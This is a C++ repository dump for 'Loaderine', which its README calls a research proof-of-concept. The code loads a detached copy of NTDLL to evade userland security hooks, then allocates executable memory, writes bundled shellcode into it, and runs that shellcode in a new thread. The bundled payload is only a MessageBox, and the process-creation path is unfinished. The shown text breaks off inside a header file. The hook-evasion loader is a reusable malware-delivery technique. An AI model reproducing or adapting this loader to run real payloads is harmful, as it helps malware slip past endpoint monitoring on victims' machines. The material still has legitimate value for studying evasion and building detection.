├── .gitmodules ├── CMakeLists.txt ├── README.md └── basic_ldr ├── CMakeLists.txt ├── main.cpp ├── ntddk.h ├── ntdll_detached.cpp ├── ntdll_detached.h ├── ntdll_types.h └── shellcodes.h /.gitmodules: -------------------------------------------------------------------------------- 1 | [submodule "libpeconv"] 2 | path = libpeconv 3 | url = https://github.com/hasherezade/libpeconv.git 4 | -------------------------------------------------------------------------------- /CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required ( VERSION 2.8 ) 2 | 3 | project ( loaderine ) 4 | 5 | # libs 6 | # modules: 7 | set ( M_PARSER "libpeconv/libpeconv" ) 8 | 9 | # modules paths: 10 | set (PECONV_DIR "${CMAKE_SOURCE_DIR}/${M_PARSER}" CACHE PATH "PEConv main path") 11 | add_subdirectory ( ${PECONV_DIR} ) 12 | set ( PECONV_LIB $ CACHE FILE "PEConvLib library path" ) 13 | 14 | # Add sub-directories 15 | # 16 | add_subdirectory ( basic_ldr ) 17 | 18 | #dependencies: 19 | add_dependencies( basic_ldr libpeconv ) 20 | 21 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Loaderine 2 | --- 3 | A demo that loads and runs code through a detached copy of NTDLL, calling the Nt* functions from that copy instead of the process's regular NTDLL in order to evade userland hooks that monitor API activity.
4 | WARNING: Experimental version, intended as a research proof-of-concept. The current demo allocates RWX memory in its own process (NtAllocateVirtualMemory with PAGE_EXECUTE_READWRITE), writes the bundled MessageBox shellcode there (NtWriteVirtualMemory) and starts a thread on it (NtCreateThreadEx); the process-creation path (NtCreateSection/NtCreateProcessEx) is unfinished and not invoked from main. Note that this technique only sidesteps userland hooks on the loaded NTDLL's exports: the calls still transition to the kernel as ordinary syscalls, so kernel-side monitoring of the same operations is unaffected. 5 | 6 | + uses library: 7 | https://github.com/hasherezade/libpeconv.git
8 | -------------------------------------------------------------------------------- /basic_ldr/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required (VERSION 2.8) 2 | 3 | project (basic_ldr) 4 | 5 | set(CMAKE_CXX_FLAGS_RELEASE "${CMAKE_CXX_FLAGS_RELEASE} /MT") 6 | 7 | #include libpeconv headers: 8 | include_directories ( ${PECONV_DIR}/include ) 9 | 10 | set (srcs 11 | main.cpp 12 | ntdll_detached.cpp 13 | ) 14 | 15 | set (hdrs 16 | ntddk.h 17 | ntdll_detached.h 18 | shellcodes.h 19 | ) 20 | 21 | add_executable ( ${PROJECT_NAME} ${hdrs} ${srcs} ) 22 | 23 | # link with libpeconv.lib 24 | target_link_libraries ( ${PROJECT_NAME} ${PECONV_LIB} ) 25 | -------------------------------------------------------------------------------- /basic_ldr/main.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | #include "ntdll_detached.h" 5 | #include "peconv.h" 6 | #include "shellcodes.h" 7 | 8 | HANDLE run_in_new_thread(HANDLE hProcess, LPVOID entry_point) 9 | { 10 | HANDLE hMyThread = NULL; 11 | NTSTATUS status = ntdll_NtCreateThreadEx(&hMyThread, 12 | THREAD_ALL_ACCESS, 13 | NULL, 14 | hProcess, 15 | (LPTHREAD_START_ROUTINE) entry_point, 16 | NULL, 17 | 0, 18 | 0, 19 | 0, 20 | 0, 21 | NULL 22 | ); 23 | if (status != STATUS_SUCCESS) { 24 | std::cerr << "[ERROR] NtCreateThreadEx failed, status : " << status << std::endl; 25 | return INVALID_HANDLE_VALUE; 26 | } 27 | return hMyThread; 28 | } 29 | 30 | HANDLE open_file(wchar_t* dummy_name) 31 | { 32 | HANDLE hFile = CreateFileW(dummy_name, 33 | GENERIC_WRITE | GENERIC_READ, 34 | 0, 35 | NULL, 36 | OPEN_EXISTING, 37 | FILE_ATTRIBUTE_NORMAL, 38 | NULL 39 | ); 40 | return hFile; 41 | } 42 | 43 | HANDLE create_process(HANDLE hFile) 44 | { 45 | HANDLE hSection = nullptr; 46 | NTSTATUS status = ntdll_NtCreateSection(&hSection, 47 | SECTION_ALL_ACCESS, 48 | NULL, 49 | 0, 50 | PAGE_READONLY, 51 | 
SEC_IMAGE, 52 | hFile 53 | ); 54 | if (status != STATUS_SUCCESS) { 55 | std::cerr << "NtCreateSection failed" << std::endl; 56 | return INVALID_HANDLE_VALUE; 57 | } 58 | HANDLE hProcess = nullptr; 59 | status = ntdll_NtCreateProcessEx( 60 | &hProcess, //ProcessHandle 61 | PROCESS_ALL_ACCESS, //DesiredAccess 62 | NULL, //ObjectAttributes 63 | ntdll_NtCurrentProcess(), //ParentProcess 64 | PS_INHERIT_HANDLES, //Flags 65 | hSection, //sectionHandle 66 | NULL, //DebugPort 67 | NULL, //ExceptionPort 68 | FALSE //InJob 69 | ); 70 | if (status != STATUS_SUCCESS) { 71 | std::cerr << "NtCreateProcessEx failed" << std::endl; 72 | return INVALID_HANDLE_VALUE; 73 | } 74 | return hProcess; 75 | } 76 | 77 | bool run_shellcode(HANDLE hProcess) 78 | { 79 | PVOID base_addr = 0; 80 | SIZE_T buffer_size = 0x1000; 81 | NTSTATUS status = ntdll_NtAllocateVirtualMemory( 82 | hProcess, 83 | &base_addr, 0, 84 | &buffer_size, 85 | MEM_COMMIT | MEM_RESERVE, 86 | PAGE_EXECUTE_READWRITE 87 | ); 88 | if (status != STATUS_SUCCESS) { 89 | std::cout << "Alloc failed!" << std::endl; 90 | return false; 91 | } 92 | std::cout << "Success" << std::endl; 93 | std::cout << base_addr << std::endl; 94 | PVOID shellcode_ptr = NULL; 95 | ULONG shellcode_size = 0; 96 | 97 | #ifndef _WIN64 98 | shellcode_ptr = messageBox32bit_sc; 99 | shellcode_size = sizeof(messageBox32bit_sc); 100 | #else 101 | shellcode_ptr = messageBox64bit_sc; 102 | shellcode_size = sizeof(messageBox64bit_sc); 103 | #endif 104 | 105 | status = ntdll_NtWriteVirtualMemory(hProcess, base_addr, shellcode_ptr, shellcode_size, nullptr); 106 | if (status != STATUS_SUCCESS) { 107 | std::cout << "Writing failed!" 
<< std::endl; 108 | return false; 109 | } 110 | HANDLE hThread = run_in_new_thread(hProcess, base_addr); 111 | if (hThread != INVALID_HANDLE_VALUE) { 112 | std::cout << "Created Thread, id " << std::hex << GetThreadId(hThread) << std::endl; 113 | WaitForSingleObject(hThread, INFINITE); 114 | } 115 | return true; 116 | } 117 | 118 | bool run_new_process(wchar_t *path) 119 | { 120 | HANDLE file = open_file(path); 121 | if (file == INVALID_HANDLE_VALUE) { 122 | std::cerr << "Opening file failed!" << std::endl; 123 | return false; 124 | } 125 | HANDLE hProcess = create_process(file); 126 | if (hProcess == INVALID_HANDLE_VALUE) { 127 | std::cerr << "Creating process failed!" << std::endl; 128 | return false; 129 | } 130 | //TODO: setup process parameters 131 | //TODO2: run a thread inside the process 132 | return true; 133 | } 134 | 135 | int main(int argc, char *argv[]) 136 | { 137 | size_t ntdll_size = 0; 138 | HMODULE ntdll_mod = load_ntdll(ntdll_size); 139 | if (!init_ntdll_func(ntdll_mod)) { 140 | std::cerr << "Init failed!" << std:: endl; 141 | system("pause"); 142 | return -1; 143 | } 144 | 145 | if (run_shellcode(ntdll_NtCurrentProcess())) { 146 | std::cout <<"[+] Success" << std::endl; 147 | } 148 | system("pause"); 149 | return 0; 150 | } 151 | 152 | -------------------------------------------------------------------------------- /basic_ldr/ntddk.h: -------------------------------------------------------------------------------- 1 | #ifndef __NTDLL_H__ 2 | #define __NTDLL_H__ 3 | 4 | #ifdef __cplusplus 5 | extern "C" { 6 | #endif 7 | #include 8 | 9 | #ifdef _NTDDK_ 10 | #error This header cannot be compiled together with NTDDK 11 | #endif 12 | /* 13 | //Do not insert the library. Only definitions. 
14 | 15 | #ifndef _NTDLL_SELF_ // Auto-insert the library 16 | #pragma comment(lib, "Ntdll.lib") 17 | #endif 18 | */ 19 | #pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union 20 | 21 | #pragma warning(push) 22 | #pragma warning(disable:4005) 23 | #include 24 | #pragma warning(pop) 25 | 26 | //------------------------------------------------------------------------------ 27 | // Defines for NTSTATUS 28 | 29 | typedef long NTSTATUS; 30 | 31 | #ifndef NT_SUCCESS 32 | #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0) 33 | #endif 34 | 35 | #ifndef STATUS_SUCCESS 36 | #define STATUS_SUCCESS ((NTSTATUS)0x00000000L) 37 | #endif 38 | 39 | #ifndef STATUS_UNSUCCESSFUL 40 | #define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L) 41 | #endif 42 | 43 | #ifndef ASSERT 44 | #ifdef _DEBUG 45 | #define ASSERT(x) assert(x) 46 | #else 47 | #define ASSERT(x) /* x */ 48 | #endif 49 | #endif 50 | 51 | //------------------------------------------------------------------------------ 52 | // Structures 53 | 54 | typedef enum _EVENT_TYPE 55 | { 56 | NotificationEvent, 57 | SynchronizationEvent 58 | 59 | } EVENT_TYPE; 60 | 61 | // 62 | // ANSI strings are counted 8-bit character strings. If they are 63 | // NULL terminated, Length does not include trailing NULL. 64 | // 65 | 66 | #ifndef _NTSECAPI_ 67 | typedef struct _STRING 68 | { 69 | USHORT Length; 70 | USHORT MaximumLength; 71 | PCHAR Buffer; 72 | 73 | } STRING, *PSTRING; 74 | 75 | // 76 | // Unicode strings are counted 16-bit character strings. If they are 77 | // NULL terminated, Length does not include trailing NULL. 
78 | // 79 | 80 | typedef struct _UNICODE_STRING 81 | { 82 | USHORT Length; 83 | USHORT MaximumLength; 84 | PWSTR Buffer; 85 | 86 | } UNICODE_STRING, *PUNICODE_STRING; 87 | #endif // _NTSECAPI_ 88 | 89 | typedef STRING ANSI_STRING; 90 | typedef PSTRING PANSI_STRING; 91 | 92 | typedef STRING OEM_STRING; 93 | typedef PSTRING POEM_STRING; 94 | typedef CONST STRING* PCOEM_STRING; 95 | 96 | typedef const UNICODE_STRING *PCUNICODE_STRING; 97 | 98 | #define UNICODE_NULL ((WCHAR)0) // winnt 99 | 100 | // 101 | // Valid values for the Attributes field 102 | // 103 | 104 | #ifndef OBJ_CASE_INSENSITIVE 105 | #define OBJ_INHERIT 0x00000002L 106 | #define OBJ_PERMANENT 0x00000010L 107 | #define OBJ_EXCLUSIVE 0x00000020L 108 | #define OBJ_CASE_INSENSITIVE 0x00000040L 109 | #define OBJ_OPENIF 0x00000080L 110 | #define OBJ_OPENLINK 0x00000100L 111 | #define OBJ_KERNEL_HANDLE 0x00000200L 112 | #define OBJ_FORCE_ACCESS_CHECK 0x00000400L 113 | #define OBJ_VALID_ATTRIBUTES 0x000007F2L 114 | 115 | // 116 | // Object Attributes structure 117 | // 118 | 119 | typedef struct _OBJECT_ATTRIBUTES 120 | { 121 | ULONG Length; 122 | HANDLE RootDirectory; 123 | PUNICODE_STRING ObjectName; 124 | ULONG Attributes; 125 | PVOID SecurityDescriptor; // Points to type SECURITY_DESCRIPTOR 126 | PVOID SecurityQualityOfService; // Points to type SECURITY_QUALITY_OF_SERVICE 127 | 128 | } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; 129 | #endif // OBJ_CASE_INSENSITIVE 130 | 131 | // 132 | // IO_STATUS_BLOCK 133 | // 134 | 135 | typedef struct _IO_STATUS_BLOCK 136 | { 137 | union 138 | { 139 | NTSTATUS Status; 140 | PVOID Pointer; 141 | }; 142 | 143 | ULONG_PTR Information; 144 | 145 | } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK; 146 | 147 | // 148 | // ClientId 149 | // 150 | 151 | typedef struct _CLIENT_ID 152 | { 153 | HANDLE UniqueProcess; 154 | HANDLE UniqueThread; 155 | 156 | } CLIENT_ID, *PCLIENT_ID; 157 | 158 | 159 | // 160 | // CURDIR structure 161 | // 162 | 163 | typedef struct _CURDIR 164 | { 165 | 
UNICODE_STRING DosPath; 166 | HANDLE Handle; 167 | 168 | } CURDIR, *PCURDIR; 169 | 170 | 171 | //------------------------------------------------------------------------------ 172 | // Macros 173 | 174 | // INIT_UNICODE_STRING is a replacement of RtlInitUnicodeString 175 | #ifndef INIT_UNICODE_STRING 176 | #define INIT_UNICODE_STRING(us, wch) \ 177 | us.MaximumLength = (USHORT)sizeof(wch); \ 178 | us.Length = (USHORT)(wcslen(wch) * sizeof(WCHAR)); \ 179 | us.Buffer = wch 180 | #endif 181 | 182 | 183 | #ifndef InitializeObjectAttributes 184 | #define InitializeObjectAttributes( p, n, a, r, s ) { \ 185 | (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \ 186 | (p)->RootDirectory = r; \ 187 | (p)->Attributes = a; \ 188 | (p)->ObjectName = n; \ 189 | (p)->SecurityDescriptor = s; \ 190 | (p)->SecurityQualityOfService = NULL; \ 191 | } 192 | #endif 193 | 194 | 195 | #ifndef InitializePortHeader 196 | #define InitializeMessageHeader( ph, l, t ) { \ 197 | (ph)->TotalLength = (USHORT)(l); \ 198 | (ph)->DataLength = (USHORT)(l - sizeof(PORT_MESSAGE)); \ 199 | (ph)->Type = (USHORT)(t); \ 200 | (ph)->VirtualRangesOffset = 0; \ 201 | } 202 | #endif 203 | 204 | //----------------------------------------------------------------------------- 205 | // Image functions 206 | 207 | NTSYSAPI 208 | PVOID 209 | NTAPI 210 | RtlImageNtHeader ( 211 | IN PVOID BaseAddress 212 | ); 213 | 214 | NTSYSAPI 215 | PVOID 216 | NTAPI 217 | RtlImageDirectoryEntryToData ( 218 | IN PVOID Base, 219 | IN BOOLEAN MappedAsImage, 220 | IN USHORT DirectoryEntry, 221 | OUT PULONG Size 222 | ); 223 | 224 | //----------------------------------------------------------------------------- 225 | // Unicode string functions 226 | 227 | NTSYSAPI 228 | NTSTATUS 229 | NTAPI 230 | RtlStringFromGUID( 231 | IN REFGUID Guid, 232 | OUT PUNICODE_STRING GuidString 233 | ); 234 | 235 | 236 | NTSYSAPI 237 | VOID 238 | NTAPI 239 | RtlInitUnicodeString( 240 | PUNICODE_STRING DestinationString, 241 | PCWSTR SourceString 242 | ); 243 | 
244 | 245 | NTSYSAPI 246 | BOOLEAN 247 | NTAPI 248 | RtlCreateUnicodeString( 249 | OUT PUNICODE_STRING DestinationString, 250 | IN PCWSTR SourceString 251 | ); 252 | 253 | 254 | NTSYSAPI 255 | BOOLEAN 256 | NTAPI 257 | RtlCreateUnicodeStringFromAsciiz( 258 | OUT PUNICODE_STRING Destination, 259 | IN PCSTR Source 260 | ); 261 | 262 | 263 | NTSYSAPI 264 | BOOLEAN 265 | NTAPI 266 | RtlPrefixUnicodeString ( 267 | IN PUNICODE_STRING String1, 268 | IN PUNICODE_STRING String2, 269 | IN BOOLEAN CaseInSensitive 270 | ); 271 | 272 | 273 | NTSYSAPI 274 | NTSTATUS 275 | NTAPI 276 | RtlDuplicateUnicodeString( 277 | IN BOOLEAN AllocateNew, 278 | IN PUNICODE_STRING SourceString, 279 | OUT PUNICODE_STRING TargetString 280 | ); 281 | 282 | 283 | NTSYSAPI 284 | NTSTATUS 285 | NTAPI 286 | RtlAppendUnicodeToString ( 287 | PUNICODE_STRING Destination, 288 | PCWSTR Source 289 | ); 290 | 291 | 292 | NTSYSAPI 293 | NTSTATUS 294 | NTAPI 295 | RtlAppendUnicodeStringToString( 296 | IN OUT PUNICODE_STRING Destination, 297 | IN PUNICODE_STRING Source 298 | ); 299 | 300 | 301 | NTSYSAPI 302 | NTSTATUS 303 | NTAPI 304 | RtlUnicodeStringToInteger ( 305 | IN PUNICODE_STRING String, 306 | IN ULONG Base OPTIONAL, 307 | OUT PULONG Value 308 | ); 309 | 310 | 311 | NTSYSAPI 312 | NTSTATUS 313 | NTAPI 314 | RtlIntegerToUnicodeString ( 315 | IN ULONG Value, 316 | IN ULONG Base OPTIONAL, 317 | IN OUT PUNICODE_STRING String 318 | ); 319 | 320 | 321 | NTSYSAPI 322 | NTSTATUS 323 | NTAPI 324 | RtlGUIDFromString( 325 | IN PUNICODE_STRING GuidString, 326 | OUT GUID *Guid 327 | ); 328 | 329 | 330 | NTSYSAPI 331 | LONG 332 | NTAPI 333 | RtlCompareUnicodeString ( 334 | IN PUNICODE_STRING String1, 335 | IN PUNICODE_STRING String2, 336 | IN BOOLEAN CaseInSensitive 337 | ); 338 | 339 | 340 | NTSYSAPI 341 | VOID 342 | NTAPI 343 | RtlCopyUnicodeString( 344 | OUT PUNICODE_STRING DestinationString, 345 | IN PUNICODE_STRING SourceString 346 | ); 347 | 348 | 349 | NTSYSAPI 350 | NTSTATUS 351 | NTAPI 352 | 
RtlUpcaseUnicodeString ( 353 | OUT PUNICODE_STRING DestinationString, 354 | IN PUNICODE_STRING SourceString, 355 | IN BOOLEAN AllocateDestinationString 356 | ); 357 | 358 | 359 | NTSYSAPI 360 | NTSTATUS 361 | NTAPI 362 | RtlDowncaseUnicodeString ( 363 | OUT PUNICODE_STRING DestinationString, 364 | IN PUNICODE_STRING SourceString, 365 | IN BOOLEAN AllocateDestinationString 366 | ); 367 | 368 | 369 | NTSYSAPI 370 | BOOLEAN 371 | NTAPI 372 | RtlEqualUnicodeString ( 373 | IN PUNICODE_STRING String1, 374 | IN PUNICODE_STRING String2, 375 | IN BOOLEAN CaseInSensitive 376 | ); 377 | 378 | 379 | NTSYSAPI 380 | VOID 381 | NTAPI 382 | RtlFreeUnicodeString( 383 | IN PUNICODE_STRING UnicodeString 384 | ); 385 | 386 | 387 | NTSYSAPI 388 | NTSTATUS 389 | NTAPI 390 | RtlAnsiStringToUnicodeString ( 391 | OUT PUNICODE_STRING DestinationString, 392 | IN PANSI_STRING SourceString, 393 | IN BOOLEAN AllocateDestinationString 394 | ); 395 | 396 | 397 | NTSYSAPI 398 | NTSTATUS 399 | NTAPI 400 | RtlUnicodeStringToAnsiString ( 401 | OUT PANSI_STRING DestinationString, 402 | IN PUNICODE_STRING SourceString, 403 | IN BOOLEAN AllocateDestinationString 404 | ); 405 | 406 | 407 | NTSYSAPI 408 | VOID 409 | NTAPI 410 | RtlInitAnsiString ( 411 | OUT PANSI_STRING DestinationString, 412 | IN PCHAR SourceString 413 | ); 414 | 415 | 416 | NTSYSAPI 417 | VOID 418 | NTAPI 419 | RtlFreeAnsiString ( 420 | IN PANSI_STRING AnsiString 421 | ); 422 | 423 | 424 | NTSYSAPI 425 | NTSTATUS 426 | NTAPI 427 | RtlFormatCurrentUserKeyPath( 428 | OUT PUNICODE_STRING CurrentUserKeyPath 429 | ); 430 | 431 | 432 | NTSYSAPI 433 | VOID 434 | NTAPI 435 | RtlRaiseStatus ( 436 | IN NTSTATUS Status 437 | ); 438 | 439 | 440 | NTSYSAPI 441 | VOID 442 | NTAPI 443 | DbgBreakPoint( 444 | VOID 445 | ); 446 | 447 | 448 | NTSYSAPI 449 | ULONG 450 | _cdecl 451 | DbgPrint ( 452 | PCH Format, 453 | ... 
454 | ); 455 | 456 | 457 | NTSYSAPI 458 | ULONG 459 | NTAPI 460 | RtlRandom( 461 | IN OUT PULONG Seed 462 | ); 463 | 464 | //----------------------------------------------------------------------------- 465 | // Critical section functions 466 | 467 | NTSYSAPI 468 | NTSTATUS 469 | NTAPI 470 | RtlInitializeCriticalSection( 471 | IN PRTL_CRITICAL_SECTION CriticalSection 472 | ); 473 | 474 | 475 | NTSYSAPI 476 | BOOL 477 | NTAPI 478 | RtlTryEnterCriticalSection( 479 | IN PRTL_CRITICAL_SECTION CriticalSection 480 | ); 481 | 482 | 483 | NTSYSAPI 484 | NTSTATUS 485 | NTAPI 486 | RtlEnterCriticalSection( 487 | IN PRTL_CRITICAL_SECTION CriticalSection 488 | ); 489 | 490 | 491 | NTSYSAPI 492 | NTSTATUS 493 | NTAPI 494 | RtlLeaveCriticalSection( 495 | IN PRTL_CRITICAL_SECTION CriticalSection 496 | ); 497 | 498 | 499 | NTSYSAPI 500 | NTSTATUS 501 | NTAPI 502 | RtlDeleteCriticalSection( 503 | IN PRTL_CRITICAL_SECTION CriticalSection 504 | ); 505 | 506 | //----------------------------------------------------------------------------- 507 | // Object functions 508 | 509 | // 510 | // Object Manager Directory Specific Access Rights. 
511 | // 512 | 513 | #ifndef DIRECTORY_QUERY 514 | #define DIRECTORY_QUERY (0x0001) 515 | #define DIRECTORY_TRAVERSE (0x0002) 516 | #define DIRECTORY_CREATE_OBJECT (0x0004) 517 | #define DIRECTORY_CREATE_SUBDIRECTORY (0x0008) 518 | #define DIRECTORY_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0xF) 519 | #endif 520 | 521 | typedef enum _POOL_TYPE { 522 | NonPagedPool, 523 | PagedPool, 524 | NonPagedPoolMustSucceed, 525 | DontUseThisType, 526 | NonPagedPoolCacheAligned, 527 | PagedPoolCacheAligned, 528 | NonPagedPoolCacheAlignedMustS, 529 | MaxPoolType 530 | } POOL_TYPE; 531 | 532 | 533 | // 534 | // For NtQueryObject 535 | // 536 | 537 | typedef enum _OBJECT_INFORMATION_CLASS { 538 | ObjectBasicInformation, // = 0 539 | ObjectNameInformation, // = 1 540 | ObjectTypeInformation, // = 2 541 | ObjectTypesInformation, // = 3 //object handle is ignored 542 | ObjectHandleFlagInformation // = 4 543 | } OBJECT_INFORMATION_CLASS; 544 | 545 | // 546 | // NtQueryObject uses ObjectBasicInformation 547 | // 548 | 549 | typedef struct _OBJECT_BASIC_INFORMATION { 550 | ULONG Attributes; 551 | ACCESS_MASK GrantedAccess; 552 | ULONG HandleCount; 553 | ULONG PointerCount; 554 | ULONG PagedPoolCharge; 555 | ULONG NonPagedPoolCharge; 556 | ULONG Reserved[3]; 557 | ULONG NameInfoSize; 558 | ULONG TypeInfoSize; 559 | ULONG SecurityDescriptorSize; 560 | LARGE_INTEGER CreationTime; 561 | } OBJECT_BASIC_INFORMATION, *POBJECT_BASIC_INFORMATION; 562 | 563 | // 564 | // NtQueryObject uses ObjectNameInformation 565 | // 566 | 567 | typedef struct _OBJECT_NAME_INFORMATION { 568 | UNICODE_STRING Name; 569 | } OBJECT_NAME_INFORMATION, *POBJECT_NAME_INFORMATION; 570 | 571 | // 572 | // NtQueryObject uses ObjectTypeInformation 573 | // 574 | 575 | typedef struct _OBJECT_TYPE_INFORMATION { 576 | UNICODE_STRING TypeName; 577 | ULONG TotalNumberOfObjects; 578 | ULONG TotalNumberOfHandles; 579 | ULONG TotalPagedPoolUsage; 580 | ULONG TotalNonPagedPoolUsage; 581 | ULONG TotalNamePoolUsage; 582 | ULONG 
TotalHandleTableUsage; 583 | ULONG HighWaterNumberOfObjects; 584 | ULONG HighWaterNumberOfHandles; 585 | ULONG HighWaterPagedPoolUsage; 586 | ULONG HighWaterNonPagedPoolUsage; 587 | ULONG HighWaterNamePoolUsage; 588 | ULONG HighWaterHandleTableUsage; 589 | ULONG InvalidAttributes; 590 | GENERIC_MAPPING GenericMapping; 591 | ULONG ValidAccessMask; 592 | BOOLEAN SecurityRequired; 593 | BOOLEAN MaintainHandleCount; 594 | POOL_TYPE PoolType; 595 | ULONG DefaultPagedPoolCharge; 596 | ULONG DefaultNonPagedPoolCharge; 597 | } OBJECT_TYPE_INFORMATION, *POBJECT_TYPE_INFORMATION; 598 | 599 | // 600 | // NtQueryObject uses ObjectHandleFlagInformation 601 | // NtSetInformationObject uses ObjectHandleFlagInformation 602 | // 603 | 604 | typedef struct _OBJECT_HANDLE_FLAG_INFORMATION { 605 | BOOLEAN Inherit; 606 | BOOLEAN ProtectFromClose; 607 | } OBJECT_HANDLE_FLAG_INFORMATION, *POBJECT_HANDLE_FLAG_INFORMATION; 608 | 609 | // 610 | // NtQueryDirectoryObject uses this type 611 | // 612 | 613 | typedef struct _OBJECT_DIRECTORY_INFORMATION { 614 | UNICODE_STRING Name; 615 | UNICODE_STRING TypeName; 616 | } OBJECT_DIRECTORY_INFORMATION, *POBJECT_DIRECTORY_INFORMATION; 617 | 618 | 619 | NTSYSAPI 620 | NTSTATUS 621 | NTAPI 622 | NtOpenDirectoryObject( 623 | OUT PHANDLE DirectoryHandle, 624 | IN ACCESS_MASK DesiredAccess, 625 | IN POBJECT_ATTRIBUTES ObjectAttributes 626 | ); 627 | 628 | 629 | NTSYSAPI 630 | NTSTATUS 631 | NTAPI 632 | NtQueryDirectoryObject( 633 | IN HANDLE DirectoryHandle, 634 | OUT PVOID Buffer, 635 | IN ULONG Length, 636 | IN BOOLEAN ReturnSingleEntry, 637 | IN BOOLEAN RestartScan, 638 | IN OUT PULONG Context, 639 | OUT PULONG ReturnLength OPTIONAL 640 | ); 641 | 642 | 643 | NTSYSAPI 644 | NTSTATUS 645 | NTAPI 646 | NtQueryObject ( 647 | IN HANDLE ObjectHandle, 648 | IN OBJECT_INFORMATION_CLASS ObjectInformationClass, 649 | OUT PVOID ObjectInformation, 650 | IN ULONG Length, 651 | OUT PULONG ResultLength OPTIONAL 652 | ); 653 | 654 | 655 | NTSYSAPI 656 | NTSTATUS 
657 | NTAPI 658 | NtSetInformationObject ( 659 | IN HANDLE ObjectHandle, 660 | IN OBJECT_INFORMATION_CLASS ObjectInformationClass, 661 | IN PVOID ObjectInformation, 662 | IN ULONG Length 663 | ); 664 | 665 | 666 | NTSYSAPI 667 | NTSTATUS 668 | NTAPI 669 | NtDuplicateObject ( 670 | IN HANDLE SourceProcessHandle, 671 | IN HANDLE SourceHandle, 672 | IN HANDLE TargetProcessHandle OPTIONAL, 673 | OUT PHANDLE TargetHandle OPTIONAL, 674 | IN ACCESS_MASK DesiredAccess, 675 | IN ULONG HandleAttributes, 676 | IN ULONG Options 677 | ); 678 | 679 | 680 | NTSYSAPI 681 | NTSTATUS 682 | NTAPI 683 | NtQuerySecurityObject ( 684 | IN HANDLE ObjectHandle, 685 | IN SECURITY_INFORMATION SecurityInformation, 686 | OUT PSECURITY_DESCRIPTOR SecurityDescriptor, 687 | IN ULONG DescriptorLength, 688 | OUT PULONG ReturnLength 689 | ); 690 | 691 | 692 | NTSYSAPI 693 | NTSTATUS 694 | NTAPI 695 | NtSetSecurityObject ( 696 | IN HANDLE ObjectHandle, 697 | IN SECURITY_INFORMATION SecurityInformation, 698 | IN PSECURITY_DESCRIPTOR SecurityDescriptor 699 | ); 700 | 701 | 702 | //----------------------------------------------------------------------------- 703 | // Handle table RTL functions 704 | 705 | #define LEVEL_HANDLE_ID 0x74000000 706 | #define LEVEL_HANDLE_ID_MASK 0xFF000000 707 | #define LEVEL_HANDLE_INDEX_MASK 0x00FFFFFF 708 | 709 | typedef enum _RTL_GENERIC_COMPARE_RESULTS { 710 | GenericLessThan, 711 | GenericGreaterThan, 712 | GenericEqual 713 | } RTL_GENERIC_COMPARE_RESULTS; 714 | 715 | 716 | typedef struct _RTL_SPLAY_LINKS 717 | { 718 | struct _RTL_SPLAY_LINKS *Parent; 719 | struct _RTL_SPLAY_LINKS *LeftChild; 720 | struct _RTL_SPLAY_LINKS *RightChild; 721 | } RTL_SPLAY_LINKS, *PRTL_SPLAY_LINKS; 722 | 723 | 724 | struct _RTL_GENERIC_TABLE; 725 | 726 | typedef 727 | RTL_GENERIC_COMPARE_RESULTS 728 | (NTAPI * PRTL_GENERIC_COMPARE_ROUTINE) ( 729 | struct _RTL_GENERIC_TABLE *Table, 730 | PVOID FirstStruct, 731 | PVOID SecondStruct 732 | ); 733 | 734 | typedef 735 | PVOID 736 | (NTAPI 
*PRTL_GENERIC_ALLOCATE_ROUTINE) ( 737 | struct _RTL_GENERIC_TABLE *Table, 738 | ULONG ByteSize 739 | ); 740 | 741 | typedef 742 | VOID 743 | (NTAPI *PRTL_GENERIC_FREE_ROUTINE) ( 744 | struct _RTL_GENERIC_TABLE *Table, 745 | PVOID Buffer 746 | ); 747 | 748 | 749 | typedef struct _RTL_GENERIC_TABLE { 750 | PRTL_SPLAY_LINKS TableRoot; 751 | LIST_ENTRY InsertOrderList; 752 | PLIST_ENTRY OrderedPointer; 753 | ULONG WhichOrderedElement; 754 | ULONG NumberGenericTableElements; 755 | PRTL_GENERIC_COMPARE_ROUTINE CompareRoutine; 756 | PRTL_GENERIC_ALLOCATE_ROUTINE AllocateRoutine; 757 | PRTL_GENERIC_FREE_ROUTINE FreeRoutine; 758 | PVOID TableContext; 759 | } RTL_GENERIC_TABLE, *PRTL_GENERIC_TABLE; 760 | 761 | 762 | typedef struct _RTL_HANDLE_TABLE_ENTRY 763 | { 764 | struct _RTL_HANDLE_TABLE_ENTRY *Next; /* pointer to next free handle */ 765 | PVOID Object; 766 | 767 | } RTL_HANDLE_TABLE_ENTRY, *PRTL_HANDLE_TABLE_ENTRY; 768 | 769 | 770 | typedef struct _RTL_HANDLE_TABLE 771 | { 772 | ULONG MaximumNumberOfHandles; 773 | ULONG SizeOfHandleTableEntry; 774 | ULONG Unknown01; 775 | ULONG Unknown02; 776 | PRTL_HANDLE_TABLE_ENTRY FreeHandles; 777 | PRTL_HANDLE_TABLE_ENTRY CommittedHandles; 778 | PRTL_HANDLE_TABLE_ENTRY UnCommittedHandles; 779 | PRTL_HANDLE_TABLE_ENTRY MaxReservedHandles; 780 | } RTL_HANDLE_TABLE, *PRTL_HANDLE_TABLE; 781 | 782 | 783 | NTSYSAPI 784 | VOID 785 | NTAPI 786 | RtlInitializeGenericTable ( 787 | IN PRTL_GENERIC_TABLE Table, 788 | IN PRTL_GENERIC_COMPARE_ROUTINE CompareRoutine, 789 | IN PRTL_GENERIC_ALLOCATE_ROUTINE AllocateRoutine, 790 | IN PRTL_GENERIC_FREE_ROUTINE FreeRoutine, 791 | IN PVOID TableContext 792 | ); 793 | 794 | 795 | NTSYSAPI 796 | VOID 797 | NTAPI 798 | RtlInitializeHandleTable( 799 | IN ULONG MaximumNumberOfHandles, 800 | IN ULONG SizeOfHandleTableEntry, 801 | OUT PRTL_HANDLE_TABLE HandleTable 802 | ); 803 | 804 | 805 | NTSYSAPI 806 | PRTL_HANDLE_TABLE_ENTRY 807 | NTAPI 808 | RtlAllocateHandle( 809 | IN 